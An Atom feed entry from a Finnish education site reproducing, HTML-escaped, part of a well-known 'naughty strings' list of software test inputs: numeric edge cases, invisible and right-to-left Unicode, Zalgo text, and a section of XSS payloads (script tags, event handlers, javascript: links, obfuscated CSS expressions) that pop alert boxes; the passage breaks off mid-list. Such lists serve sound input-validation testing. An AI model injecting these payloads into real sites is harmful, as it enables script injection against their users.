<?xml version="1.0" encoding="utf-8"?>
<?xml-stylesheet type="text/xsl" href="https://peda.net/:static/535/atom.xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom">
<title>naughtystrings</title>
<id>https://peda.net/id/658382dee19</id>
<updated>2018-11-06T09:20:10+02:00</updated>
<link href="https://peda.net/id/658382dee19:atom" rel="self" />
<link href="https://peda.net/p/mikko.rantalainen/bugs/ht/naughtystrings#top" rel="alternate" />
<logo>https://peda.net/:static/535/peda.net.logo.bg.svg</logo>
<rights type="html">&lt;div class=&quot;license&quot;&gt;Tämän sivun lisenssi &lt;a rel=&quot;license&quot; href=&quot;https://peda.net/info&quot;&gt;Peda.net-yleislisenssi&lt;/a&gt;&lt;/div&gt;&#10;</rights>

<entry>
<title>Tekstimerkintä</title>
<id>https://peda.net/id/705c5faae19</id>
<updated>2018-11-06T09:21:34+02:00</updated>
<link href="https://peda.net/p/mikko.rantalainen/bugs/ht/naughtystrings/nimet%C3%B6n-705c#top" />
<content type="html">&lt;div class=&quot;position-relative js-header-wrapper &quot;&gt;&#10;&lt;pre&gt;#	Reserved Strings&#10;#&#10;#	Strings which may be used elsewhere in code&#10;&#10;undefined&#10;undef&#10;null&#10;NULL&#10;(null)&#10;nil&#10;NIL&#10;true&#10;false&#10;True&#10;False&#10;TRUE&#10;FALSE&#10;None&#10;hasOwnProperty&#10;then&#10;\&#10;\\&#10;&#10;#	Numeric Strings&#10;#&#10;#	Strings which can be interpreted as numeric&#10;&#10;0&#10;1&#10;1.00&#10;$1.00&#10;1/2&#10;1E2&#10;1E02&#10;1E+02&#10;-1&#10;-1.00&#10;-$1.00&#10;-1/2&#10;-1E2&#10;-1E02&#10;-1E+02&#10;1/0&#10;0/0&#10;-2147483648/-1&#10;-9223372036854775808/-1&#10;-0&#10;-0.0&#10;+0&#10;+0.0&#10;0.00&#10;0..0&#10;.&#10;0.0.0&#10;0,00&#10;0,,0&#10;,&#10;0,0,0&#10;0.0/0&#10;1.0/0.0&#10;0.0/0.0&#10;1,0/0,0&#10;0,0/0,0&#10;--1&#10;-&#10;-.&#10;-,&#10;999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999&#10;NaN&#10;Infinity&#10;-Infinity&#10;INF&#10;1#INF&#10;-1#IND&#10;1#QNAN&#10;1#SNAN&#10;1#IND&#10;0x0&#10;0xffffffff&#10;0xffffffffffffffff&#10;0xabad1dea&#10;123456789012345678901234567890123456789&#10;1,000.00&#10;1 000.00&#10;1'000.00&#10;1,000,000.00&#10;1 000 000.00&#10;1'000'000.00&#10;1.000,00&#10;1 000,00&#10;1'000,00&#10;1.000.000,00&#10;1 000 000,00&#10;1'000'000,00&#10;01000&#10;08&#10;09&#10;2.2250738585072011e-308&#10;&#10;#	Special Characters&#10;#&#10;# ASCII punctuation.  All of these characters may need to be escaped in some&#10;# contexts.  Divided into three groups based on (US-layout) keyboard position.&#10;&#10;,./;'[]\-=&#10;&amp;lt;&amp;gt;?:&amp;quot;{}|_+&#10;!@#$%^&amp;amp;*()`~&#10;&#10;# Non-whitespace C0 controls: U+0001 through U+0008, U+000E through U+001F,&#10;# and U+007F (DEL)&#10;# Often forbidden to appear in various text-based file formats (e.g. XML),&#10;# or reused for internal delimiters on the theory that they should never&#10;# appear in input.&#10;# The next line may appear to be blank or mojibake in some viewers.&#10;??????????????????????????&#10;&#10;# Non-whitespace C1 controls: U+0080 through U+0084 and U+0086 through U+009F.&#10;# Commonly misinterpreted as additional graphic characters.&#10;# The next line may appear to be blank, mojibake, or dingbats in some viewers.&#10;&#10;&#10;# Whitespace: all of the characters with category Zs, Zl, or Zp (in Unicode&#10;# version 8.0.0), plus U+0009 (HT), U+000B (VT), U+000C (FF), U+0085 (NEL),&#10;# and U+200B (ZERO WIDTH SPACE), which are in the C categories but are often&#10;# treated as whitespace in some contexts.&#10;# This file unfortunately cannot express strings containing&#10;# U+0000, U+000A, or U+000D (NUL, LF, CR).&#10;# The next line may appear to be blank or mojibake in some viewers.&#10;# The next line may be flagged for &amp;quot;trailing whitespace&amp;quot; in some viewers.&#10;	??              ​    　&#10;&#10;# Unicode additional control characters: all of the characters with&#10;# general category Cf (in Unicode 8.0.0).&#10;# The next line may appear to be blank or mojibake in some viewers.&#10;­؀؁؂؃؄؅؜۝܏᠎​‌‍‎‏‪‫‬‭‮⁠⁡⁢⁣⁤⁦⁧⁨⁩⁪⁫⁬⁭⁮⁯￹￺￻𑂽𛲠𛲡𛲢𛲣𝅳𝅴𝅵𝅶𝅷𝅸𝅹𝅺󠀁󠀠󠀡󠀢󠀣󠀤󠀥󠀦󠀧󠀨󠀩󠀪󠀫󠀬󠀭󠀮󠀯󠀰󠀱󠀲󠀳󠀴󠀵󠀶󠀷󠀸󠀹󠀺󠀻󠀼󠀽󠀾󠀿󠁀󠁁󠁂󠁃󠁄󠁅󠁆󠁇󠁈󠁉󠁊󠁋󠁌󠁍󠁎󠁏󠁐󠁑󠁒󠁓󠁔󠁕󠁖󠁗󠁘󠁙󠁚󠁛󠁜󠁝󠁞󠁟󠁠󠁡󠁢󠁣󠁤󠁥󠁦󠁧󠁨󠁩󠁪󠁫󠁬󠁭󠁮󠁯󠁰󠁱󠁲󠁳󠁴󠁵󠁶󠁷󠁸󠁹󠁺󠁻󠁼󠁽󠁾󠁿&#10;&#10;# &amp;quot;Byte order marks&amp;quot;, U+FEFF and U+FFFE, each on its own line.&#10;# The next two lines may appear to be blank or mojibake in some viewers.&#10;&#10;�&#10;&#10;#	Unicode Symbols&#10;#&#10;#	Strings which contain common unicode symbols (e.g. smart quotes)&#10;&#10;Ω≈ç√∫˜µ≤≥÷&#10;åß∂ƒ©˙∆˚¬…æ&#10;œ∑´®†¥¨ˆøπ“‘&#10;¡™£¢∞§¶•ªº–≠&#10;¸˛Ç◊ı˜Â¯˘¿&#10;ÅÍÎÏ˝ÓÔÒÚÆ☃&#10;Œ„´‰ˇÁ¨ˆØ∏”’&#10;`⁄€‹›ﬁﬂ‡°·‚—±&#10;⅛⅜⅝⅞&#10;ЁЂЃЄЅІЇЈЉЊЋЌЍЎЏАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯабвгдежзийклмнопрстуфхцчшщъыьэюя&#10;٠١٢٣٤٥٦٧٨٩&#10;&#10;#	Unicode Subscript/Superscript/Accents&#10;#&#10;#	Strings which contain unicode subscripts/superscripts; can cause rendering issues&#10;&#10;⁰⁴⁵&#10;₀₁₂&#10;⁰⁴⁵₀₁₂&#10;ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็&#10;&#10;#	Quotation Marks&#10;#&#10;#	Strings which contain misplaced quotation marks; can cause encoding errors&#10;&#10;'&#10;&amp;quot;&#10;''&#10;&amp;quot;&amp;quot;&#10;'&amp;quot;'&#10;&amp;quot;''''&amp;quot;'&amp;quot;&#10;&amp;quot;'&amp;quot;'&amp;quot;''''&amp;quot;&#10;&amp;lt;foo val=“bar” /&amp;gt;&#10;&amp;lt;foo val=“bar” /&amp;gt;&#10;&amp;lt;foo val=”bar“ /&amp;gt;&#10;&amp;lt;foo val=`bar' /&amp;gt;&#10;&#10;#	Two-Byte Characters&#10;#&#10;#	Strings which contain two-byte characters: can cause rendering issues or character-length issues&#10;&#10;田中さんにあげて下さい&#10;パーティーへ行かないか&#10;和製漢語&#10;部落格&#10;사회과학원 어학연구소&#10;찦차를 타고 온 펲시맨과 쑛다리 똠방각하&#10;社會科學院語學研究所&#10;울란바토르&#10;𠜎𠜱𠝹𠱓𠱸𠲖𠳏&#10;&#10;#	Changing length when lowercased&#10;#&#10;#	Characters which increase in length (2 to 3 bytes) when lowercased&#10;#	Credit: &lt;div class=&quot;twitter&quot;&gt;&lt;blockquote class=&quot;twitter-tweet&quot;&gt;&lt;p&gt;fuzzing UTF-8 strings pro-tip: Ⱥ (U+023A) and Ⱦ (U+023E) are the *only* code points to increase in length (2 to 3 bytes) when lowercased.&lt;/p&gt;&#10;— Shahar Tal (@jifa) &lt;a href=&quot;https://twitter.com/jifa/status/625776454479970304?ref_src=twsrc%5Etfw&quot; rel=&quot;nofollow ugc noopener&quot;&gt;July 27, 2015&lt;/a&gt;&lt;/blockquote&gt;&#10;&lt;div&gt;&lt;a href=&quot;https://twitter.com/jifa/status/625776454479970304&quot; title=&quot;https://twitter.com/jifa/status/625776454479970304&quot; target=&quot;_blank&quot; rel=&quot;nofollow ugc noopener&quot;&gt;https://twitter.com/jifa/status/625776454479970304&lt;/a&gt;&lt;/div&gt;&#10;&lt;/div&gt;&#10;&#10;&#10;Ⱥ&#10;Ⱦ&#10;&#10;#	Japanese Emoticons&#10;#&#10;#	Strings which consists of Japanese-style emoticons which are popular on the web&#10;&#10;ヽ༼ຈل͜ຈ༽ﾉ ヽ༼ຈل͜ຈ༽ﾉ&#10;(｡◕ ∀ ◕｡)&#10;｀ｨ(´∀｀∩&#10;__ﾛ(,_,*)&#10;・(￣∀￣)・:*:&#10;ﾟ･✿ヾ╲(｡◕‿◕｡)╱✿･ﾟ&#10;,。・:*:・゜’( ☻ ω ☻ )。・:*:・゜’&#10;(╯°□°）╯︵ ┻━┻)&#10;(ﾉಥ益ಥ）ﾉ ┻━┻&#10;┬─┬ノ( º _ ºノ)&#10;( ͡° ͜ʖ ͡°)&#10;¯\_(ツ)_/¯&#10;&#10;#	Emoji&#10;#&#10;#	Strings which contain Emoji; should be the same behavior as two-byte characters, but not always&#10;&#10;😍&#10;👩🏽&#10;👾 🙇 💁 🙅 🙆 🙋 🙎 🙍&#10;🐵 🙈 🙉 🙊&#10;❤️ 💔 💌 💕 💞 💓 💗 💖 💘 💝 💟 💜 💛 💚 💙&#10;✋🏿 💪🏿 👐🏿 🙌🏿 👏🏿 🙏🏿&#10;🚾 🆒 🆓 🆕 🆖 🆗 🆙 🏧&#10;0️⃣ 1️⃣ 2️⃣ 3️⃣ 4️⃣ 5️⃣ 6️⃣ 7️⃣ 8️⃣ 9️⃣ 🔟&#10;&#10;#       Regional Indicator Symbols&#10;#&#10;#       Regional Indicator Symbols can be displayed differently across&#10;#       fonts, and have a number of special behaviors&#10;&#10;🇺🇸🇷🇺🇸 🇦🇫🇦🇲🇸&#10;🇺🇸🇷🇺🇸🇦🇫🇦🇲&#10;🇺🇸🇷🇺🇸🇦&#10;&#10;#	Unicode Numbers&#10;#&#10;#	Strings which contain unicode numbers; if the code is localized, it should see the input as numeric&#10;&#10;１２３&#10;١٢٣&#10;&#10;#	Right-To-Left Strings&#10;#&#10;#	Strings which contain text that should be rendered RTL if possible (e.g. Arabic, Hebrew)&#10;&#10;ثم نفس سقطت وبالتحديد،, جزيرتي باستخدام أن دنو. إذ هنا؟ الستار وتنصيب كان. أهّل ايطاليا، بريطانيا-فرنسا قد أخذ. سليمان، إتفاقية بين ما, يذكر الحدود أي بعد, معاملة بولندا، الإطلاق عل إيو.&#10;בְּרֵאשִׁית, בָּרָא אֱלֹהִים, אֵת הַשָּׁמַיִם, וְאֵת הָאָרֶץ&#10;הָיְתָהtestالصفحات التّحول&#10;﷽&#10;ﷺ&#10;مُنَاقَشَةُ سُبُلِ اِسْتِخْدَامِ اللُّغَةِ فِي النُّظُمِ الْقَائِمَةِ وَفِيم يَخُصَّ التَّطْبِيقَاتُ الْحاسُوبِيَّةُ، &#10;&#10;#	Trick Unicode&#10;#&#10;#	Strings which contain unicode with unusual properties (e.g. Right-to-left override) (c.f. &lt;a href=&quot;http://www.unicode.org/charts/PDF/U2000.pdf)&quot; rel=&quot;nofollow ugc noopener&quot;&gt;http://www.unicode.org/charts/PDF/U2000.pdf)&lt;/a&gt;&#10;&#10;‪‪test‪&#10;‫test‫&#10; test &#10;test⁠test‫&#10;⁦test⁧&#10;&#10;#	Zalgo Text&#10;#&#10;#	Strings which contain &amp;quot;corrupted&amp;quot; text. The corruption will not appear in non-HTML text, however. (via &lt;a href=&quot;http://www.eeemo.net)&quot; rel=&quot;nofollow ugc noopener&quot;&gt;http://www.eeemo.net)&lt;/a&gt;&#10;&#10;Ṱ̺̺̕o͞ ̷i̲̬͇̪͙n̝̗͕v̟̜̘̦͟o̶̙̰̠kè͚̮̺̪̹̱̤ ̖t̝͕̳̣̻̪͞h̼͓̲̦̳̘̲e͇̣̰̦̬͎ ̢̼̻̱̘h͚͎͙̜̣̲ͅi̦̲̣̰̤v̻͍e̺̭̳̪̰-m̢iͅn̖̺̞̲̯̰d̵̼̟͙̩̼̘̳ ̞̥̱̳̭r̛̗̘e͙p͠r̼̞̻̭̗e̺̠̣͟s̘͇̳͍̝͉e͉̥̯̞̲͚̬͜ǹ̬͎͎̟̖͇̤t͍̬̤͓̼̭͘ͅi̪̱n͠g̴͉ ͏͉ͅc̬̟h͡a̫̻̯͘o̫̟̖͍̙̝͉s̗̦̲.̨̹͈̣&#10;̡͓̞ͅI̗̘̦͝n͇͇͙v̮̫ok̲̫̙͈i̖͙̭̹̠̞n̡̻̮̣̺g̲͈͙̭͙̬͎ ̰t͔̦h̞̲e̢̤ ͍̬̲͖f̴̘͕̣è͖ẹ̥̩l͖͔͚i͓͚̦͠n͖͍̗͓̳̮g͍ ̨o͚̪͡f̘̣̬ ̖̘͖̟͙̮c҉͔̫͖͓͇͖ͅh̵̤̣͚͔á̗̼͕ͅo̼̣̥s̱͈̺̖̦̻͢.̛̖̞̠̫̰&#10;̗̺͖̹̯͓Ṯ̤͍̥͇͈h̲́e͏͓̼̗̙̼̣͔ ͇̜̱̠͓͍ͅN͕͠e̗̱z̘̝̜̺͙p̤̺̹͍̯͚e̠̻̠͜r̨̤͍̺̖͔̖̖d̠̟̭̬̝͟i̦͖̩͓͔̤a̠̗̬͉̙n͚͜ ̻̞̰͚ͅh̵͉i̳̞v̢͇ḙ͎͟-҉̭̩̼͔m̤̭̫i͕͇̝̦n̗͙ḍ̟ ̯̲͕͞ǫ̟̯̰̲͙̻̝f ̪̰̰̗̖̭̘͘c̦͍̲̞͍̩̙ḥ͚a̮͎̟̙͜ơ̩̹͎s̤.̝̝ ҉Z̡̖̜͖̰̣͉̜a͖̰͙̬͡l̲̫̳͍̩g̡̟̼̱͚̞̬ͅo̗͜.̟&#10;̦H̬̤̗̤͝e͜ ̜̥̝̻͍̟́w̕h̖̯͓o̝͙̖͎̱̮ ҉̺̙̞̟͈W̷̼̭a̺̪͍į͈͕̭͙̯̜t̶̼̮s̘͙͖̕ ̠̫̠B̻͍͙͉̳ͅe̵h̵̬͇̫͙i̹͓̳̳̮͎̫̕n͟d̴̪̜̖ ̰͉̩͇͙̲͞ͅT͖̼͓̪͢h͏͓̮̻e̬̝̟ͅ ̤̹̝W͙̞̝͔͇͝ͅa͏͓͔̹̼̣l̴͔̰̤̟͔ḽ̫.͕&#10;Z̮̞̠͙͔ͅḀ̗̞͈̻̗Ḷ͙͎̯̹̞͓G̻O̭̗̮&#10;&#10;#	Unicode Upsidedown&#10;#&#10;#	Strings which contain unicode with an &amp;quot;upsidedown&amp;quot; effect (via &lt;a href=&quot;http://www.upsidedowntext.com)&quot; rel=&quot;nofollow ugc noopener&quot;&gt;http://www.upsidedowntext.com)&lt;/a&gt;&#10;&#10;˙ɐnbᴉlɐ ɐuƃɐɯ ǝɹolop ʇǝ ǝɹoqɐl ʇn ʇunpᴉpᴉɔuᴉ ɹodɯǝʇ poɯsnᴉǝ op pǝs 'ʇᴉlǝ ƃuᴉɔsᴉdᴉpɐ ɹnʇǝʇɔǝsuoɔ 'ʇǝɯɐ ʇᴉs ɹolop ɯnsdᴉ ɯǝɹo˥&#10;00˙Ɩ$-&#10;&#10;#	Unicode font&#10;#&#10;#	Strings which contain bold/italic/etc. versions of normal characters&#10;&#10;Ｔｈｅ ｑｕｉｃｋ ｂｒｏｗｎ ｆｏｘ ｊｕｍｐｓ ｏｖｅｒ ｔｈｅ ｌａｚｙ ｄｏｇ&#10;𝐓𝐡𝐞 𝐪𝐮𝐢𝐜𝐤 𝐛𝐫𝐨𝐰𝐧 𝐟𝐨𝐱 𝐣𝐮𝐦𝐩𝐬 𝐨𝐯𝐞𝐫 𝐭𝐡𝐞 𝐥𝐚𝐳𝐲 𝐝𝐨𝐠&#10;𝕿𝖍𝖊 𝖖𝖚𝖎𝖈𝖐 𝖇𝖗𝖔𝖜𝖓 𝖋𝖔𝖝 𝖏𝖚𝖒𝖕𝖘 𝖔𝖛𝖊𝖗 𝖙𝖍𝖊 𝖑𝖆𝖟𝖞 𝖉𝖔𝖌&#10;𝑻𝒉𝒆 𝒒𝒖𝒊𝒄𝒌 𝒃𝒓𝒐𝒘𝒏 𝒇𝒐𝒙 𝒋𝒖𝒎𝒑𝒔 𝒐𝒗𝒆𝒓 𝒕𝒉𝒆 𝒍𝒂𝒛𝒚 𝒅𝒐𝒈&#10;𝓣𝓱𝓮 𝓺𝓾𝓲𝓬𝓴 𝓫𝓻𝓸𝔀𝓷 𝓯𝓸𝔁 𝓳𝓾𝓶𝓹𝓼 𝓸𝓿𝓮𝓻 𝓽𝓱𝓮 𝓵𝓪𝔃𝔂 𝓭𝓸𝓰&#10;𝕋𝕙𝕖 𝕢𝕦𝕚𝕔𝕜 𝕓𝕣𝕠𝕨𝕟 𝕗𝕠𝕩 𝕛𝕦𝕞𝕡𝕤 𝕠𝕧𝕖𝕣 𝕥𝕙𝕖 𝕝𝕒𝕫𝕪 𝕕𝕠𝕘&#10;𝚃𝚑𝚎 𝚚𝚞𝚒𝚌𝚔 𝚋𝚛𝚘𝚠𝚗 𝚏𝚘𝚡 𝚓𝚞𝚖𝚙𝚜 𝚘𝚟𝚎𝚛 𝚝𝚑𝚎 𝚕𝚊𝚣𝚢 𝚍𝚘𝚐&#10;⒯⒣⒠ ⒬⒰⒤⒞⒦ ⒝⒭⒪⒲⒩ ⒡⒪⒳ ⒥⒰⒨⒫⒮ ⒪⒱⒠⒭ ⒯⒣⒠ ⒧⒜⒵⒴ ⒟⒪⒢&#10;&#10;#	Script Injection&#10;#&#10;#	Strings which attempt to invoke a benign script injection; shows vulnerability to XSS&#10;&#10;&amp;lt;script&amp;gt;alert(123)&amp;lt;/script&amp;gt;&#10;&amp;amp;lt;script&amp;amp;gt;alert(&amp;amp;#39;123&amp;amp;#39;);&amp;amp;lt;/script&amp;amp;gt;&#10;&amp;lt;img src=x onerror=alert(123) /&amp;gt;&#10;&amp;lt;svg&amp;gt;&amp;lt;script&amp;gt;123&amp;lt;1&amp;gt;alert(123)&amp;lt;/script&amp;gt;&#10;&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(123)&amp;lt;/script&amp;gt;&#10;'&amp;gt;&amp;lt;script&amp;gt;alert(123)&amp;lt;/script&amp;gt;&#10;&amp;gt;&amp;lt;script&amp;gt;alert(123)&amp;lt;/script&amp;gt;&#10;&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;alert(123)&amp;lt;/script&amp;gt;&#10;&amp;lt; / script &amp;gt;&amp;lt; script &amp;gt;alert(123)&amp;lt; / script &amp;gt;&#10; onfocus=JaVaSCript:alert(123) autofocus&#10;&amp;quot; onfocus=JaVaSCript:alert(123) autofocus&#10;' onfocus=JaVaSCript:alert(123) autofocus&#10;＜script＞alert(123)＜/script＞&#10;&amp;lt;sc&amp;lt;script&amp;gt;ript&amp;gt;alert(123)&amp;lt;/sc&amp;lt;/script&amp;gt;ript&amp;gt;&#10;--&amp;gt;&amp;lt;script&amp;gt;alert(123)&amp;lt;/script&amp;gt;&#10;&amp;quot;;alert(123);t=&amp;quot;&#10;';alert(123);t='&#10;JavaSCript:alert(123)&#10;;alert(123);&#10;src=JaVaSCript:prompt(132)&#10;&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(123);&amp;lt;/script x=&amp;quot;&#10;'&amp;gt;&amp;lt;script&amp;gt;alert(123);&amp;lt;/script x='&#10;&amp;gt;&amp;lt;script&amp;gt;alert(123);&amp;lt;/script x=&#10;&amp;quot; autofocus onkeyup=&amp;quot;javascript:alert(123)&#10;' autofocus onkeyup='javascript:alert(123)&#10;&amp;lt;script\x20type=&amp;quot;text/javascript&amp;quot;&amp;gt;javascript:alert(1);&amp;lt;/script&amp;gt;&#10;&amp;lt;script\x3Etype=&amp;quot;text/javascript&amp;quot;&amp;gt;javascript:alert(1);&amp;lt;/script&amp;gt;&#10;&amp;lt;script\x0Dtype=&amp;quot;text/javascript&amp;quot;&amp;gt;javascript:alert(1);&amp;lt;/script&amp;gt;&#10;&amp;lt;script\x09type=&amp;quot;text/javascript&amp;quot;&amp;gt;javascript:alert(1);&amp;lt;/script&amp;gt;&#10;&amp;lt;script\x0Ctype=&amp;quot;text/javascript&amp;quot;&amp;gt;javascript:alert(1);&amp;lt;/script&amp;gt;&#10;&amp;lt;script\x2Ftype=&amp;quot;text/javascript&amp;quot;&amp;gt;javascript:alert(1);&amp;lt;/script&amp;gt;&#10;&amp;lt;script\x0Atype=&amp;quot;text/javascript&amp;quot;&amp;gt;javascript:alert(1);&amp;lt;/script&amp;gt;&#10;'`&amp;quot;&amp;gt;&amp;lt;\x3Cscript&amp;gt;javascript:alert(1)&amp;lt;/script&amp;gt;&#10;'`&amp;quot;&amp;gt;&amp;lt;\x00script&amp;gt;javascript:alert(1)&amp;lt;/script&amp;gt;&#10;ABC&amp;lt;div style=&amp;quot;x\x3Aexpression(javascript:alert(1)&amp;quot;&amp;gt;DEF&#10;ABC&amp;lt;div style=&amp;quot;x:expression\x5C(javascript:alert(1)&amp;quot;&amp;gt;DEF&#10;ABC&amp;lt;div style=&amp;quot;x:expression\x00(javascript:alert(1)&amp;quot;&amp;gt;DEF&#10;ABC&amp;lt;div style=&amp;quot;x:exp\x00ression(javascript:alert(1)&amp;quot;&amp;gt;DEF&#10;ABC&amp;lt;div style=&amp;quot;x:exp\x5Cression(javascript:alert(1)&amp;quot;&amp;gt;DEF&#10;ABC&amp;lt;div style=&amp;quot;x:\x0Aexpression(javascript:alert(1)&amp;quot;&amp;gt;DEF&#10;ABC&amp;lt;div style=&amp;quot;x:\x09expression(javascript:alert(1)&amp;quot;&amp;gt;DEF&#10;ABC&amp;lt;div style=&amp;quot;x:\xE3\x80\x80expression(javascript:alert(1)&amp;quot;&amp;gt;DEF&#10;ABC&amp;lt;div style=&amp;quot;x:\xE2\x80\x84expression(javascript:alert(1)&amp;quot;&amp;gt;DEF&#10;ABC&amp;lt;div style=&amp;quot;x:\xC2\xA0expression(javascript:alert(1)&amp;quot;&amp;gt;DEF&#10;ABC&amp;lt;div style=&amp;quot;x:\xE2\x80\x80expression(javascript:alert(1)&amp;quot;&amp;gt;DEF&#10;ABC&amp;lt;div style=&amp;quot;x:\xE2\x80\x8Aexpression(javascript:alert(1)&amp;quot;&amp;gt;DEF&#10;ABC&amp;lt;div style=&amp;quot;x:\x0Dexpression(javascript:alert(1)&amp;quot;&amp;gt;DEF&#10;ABC&amp;lt;div style=&amp;quot;x:\x0Cexpression(javascript:alert(1)&amp;quot;&amp;gt;DEF&#10;ABC&amp;lt;div style=&amp;quot;x:\xE2\x80\x87expression(javascript:alert(1)&amp;quot;&amp;gt;DEF&#10;ABC&amp;lt;div style=&amp;quot;x:\xEF\xBB\xBFexpression(javascript:alert(1)&amp;quot;&amp;gt;DEF&#10;ABC&amp;lt;div style=&amp;quot;x:\x20expression(javascript:alert(1)&amp;quot;&amp;gt;DEF&#10;ABC&amp;lt;div style=&amp;quot;x:\xE2\x80\x88expression(javascript:alert(1)&amp;quot;&amp;gt;DEF&#10;ABC&amp;lt;div style=&amp;quot;x:\x00expression(javascript:alert(1)&amp;quot;&amp;gt;DEF&#10;ABC&amp;lt;div style=&amp;quot;x:\xE2\x80\x8Bexpression(javascript:alert(1)&amp;quot;&amp;gt;DEF&#10;ABC&amp;lt;div style=&amp;quot;x:\xE2\x80\x86expression(javascript:alert(1)&amp;quot;&amp;gt;DEF&#10;ABC&amp;lt;div style=&amp;quot;x:\xE2\x80\x85expression(javascript:alert(1)&amp;quot;&amp;gt;DEF&#10;ABC&amp;lt;div style=&amp;quot;x:\xE2\x80\x82expression(javascript:alert(1)&amp;quot;&amp;gt;DEF&#10;ABC&amp;lt;div style=&amp;quot;x:\x0Bexpression(javascript:alert(1)&amp;quot;&amp;gt;DEF&#10;ABC&amp;lt;div style=&amp;quot;x:\xE2\x80\x81expression(javascript:alert(1)&amp;quot;&amp;gt;DEF&#10;ABC&amp;lt;div style=&amp;quot;x:\xE2\x80\x83expression(javascript:alert(1)&amp;quot;&amp;gt;DEF&#10;ABC&amp;lt;div style=&amp;quot;x:\xE2\x80\x89expression(javascript:alert(1)&amp;quot;&amp;gt;DEF&#10;&amp;lt;a href=&amp;quot;\x0Bjavascript:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;\x0Fjavascript:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;\xC2\xA0javascript:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;\x05javascript:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;\xE1\xA0\x8Ejavascript:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;\x18javascript:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;\x11javascript:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;\xE2\x80\x88javascript:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;\xE2\x80\x89javascript:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;\xE2\x80\x80javascript:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;\x17javascript:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;\x03javascript:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;\x0Ejavascript:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;\x1Ajavascript:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;\x00javascript:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;\x10javascript:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;\xE2\x80\x82javascript:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;\x20javascript:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;\x13javascript:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;\x09javascript:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;\xE2\x80\x8Ajavascript:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;\x14javascript:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;\x19javascript:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;\xE2\x80\xAFjavascript:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;\x1Fjavascript:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a 